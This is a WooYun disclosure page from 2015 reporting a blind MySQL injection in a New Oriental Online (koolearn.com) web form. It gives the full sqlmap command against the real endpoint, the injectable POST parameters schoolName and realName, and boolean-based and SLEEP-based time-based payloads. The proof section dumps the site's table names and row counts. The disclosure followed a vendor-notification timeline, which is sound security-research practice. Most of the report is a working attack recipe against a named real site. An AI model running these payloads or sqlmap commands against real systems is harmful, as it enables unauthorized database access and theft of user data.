当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157630

漏洞标题:新东方在线某站MySQL盲注

相关厂商:新东方

漏洞作者: hecate

提交时间:2015-12-02 17:20

修复时间:2016-01-17 11:32

公开时间:2016-01-17 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

2W多user

详细说明:

sqlmap -u "http://ksec.koolearn.com/kyds2015/aps" --data "schoolName=%E8%A5%BF%E5%AE%89%E5%BB%BA%E7%AD%91%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&realName=%E7%8E%8B&provincesStr=%E9%99%95%E8%A5%BF&pageNum=1&pageSize=20&area=3&createTimeSort=1&voteSort=0&sortFlag=true"
参数 schoolName,realName 均可注入


Parameter: schoolName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: schoolName=%E8%A5%BF%E5%AE%89%E5%BB%BA%E7%AD%91%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6%' AND 5238=5238 AND '%'='&realName=%E7%8E%8B&provincesStr=%E9%99%95%E8%A5%BF&pageNum=1&pageSize=20&area=3&createTimeSort=1&voteSort=0&sortFlag=true
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: schoolName=%E8%A5%BF%E5%AE%89%E5%BB%BA%E7%AD%91%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6%' AND (SELECT * FROM (SELECT(SLEEP(5)))upqD) AND '%'='&realName=%E7%8E%8B&provincesStr=%E9%99%95%E8%A5%BF&pageNum=1&pageSize=20&area=3&createTimeSort=1&voteSort=0&sortFlag=true


11.png

漏洞证明:

Database: sub2013
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| vote_relation_info | 10263149 |
| enbf_user_action | 86347 |
| sub_kouyu_pingce | 62859 |
| messageboard_content | 55621 |
| sub_beizhan_yasi | 31847 |
| enbf_user_test_result | 28643 |
| enbf_vedio_click | 22430 |
| sub_tuofu_pindao | 15759 |
| sub_kyinformationcount | 15306 |
| bak_sub_dream_2014 | 13350 |
| sub_kyds_user | 10958 |
| sub_kyds2015_user | 9447 |
| sub_courseplan_information | 5773 |
| sub_dream_2014_20150917_bak | 5433 |
| sub_dream_2014_20150423_bak | 4331 |
| sub_dream_2014_20140825_bak | 4024 |
| sub_zhichengyingyu | 3014 |
| sub_ysfjzchtf | 2576 |
| sub_kyds2015_school | 2574 |
| vote_info | 2301 |
| sub_kyds2015_user_picture | 2104 |
| sub_dream_2014 | 2075 |
| sub_zhiying_shaoer | 1892 |
| sub_kaoyan_test | 1701 |
| sub_kouyu_pingce_bak | 1205 |
| sub_general_shaifen | 1066 |
| sub_form_guide_fields | 471 |
| sub_kyds2015_user_daily | 273 |
| sub_bmfjzchtf | 236 |
| enbf_dictation | 153 |
| sub_kyds_recommend_user | 133 |
| sub_kaoyan_counseling | 82 |
| q_option | 59 |
| enbf_media | 58 |
| config_info | 33 |
| white_list | 32 |
| app_tollgate | 26 |
| sub_asia | 25 |
| q_question | 21 |
| q_result | 21 |
| sub_form_guide | 21 |
| sub_qipeiyingyu | 18 |
| enbf_user_action_bak | 15 |
| enbf_competition | 13 |
| app_grade | 10 |
| rule_description | 10 |
| sub_europe | 5 |
| q_part | 4 |
| q_questionnaire | 4 |
| q_user_log | 4 |
| sub_kyds2015_role | 4 |
| enbf_article | 3 |
| enbf_dictionary | 3 |
| module_info | 3 |
| app_userinfo | 2 |
| messageboard_active | 2 |
| sub_leyu | 2 |
| sub_mba | 2 |
| vote_active_info | 2 |
| app_record | 1 |
+-----------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-03 11:31

厂商回复:

感谢漏洞提供,我们会尽快处理!

最新状态:

暂无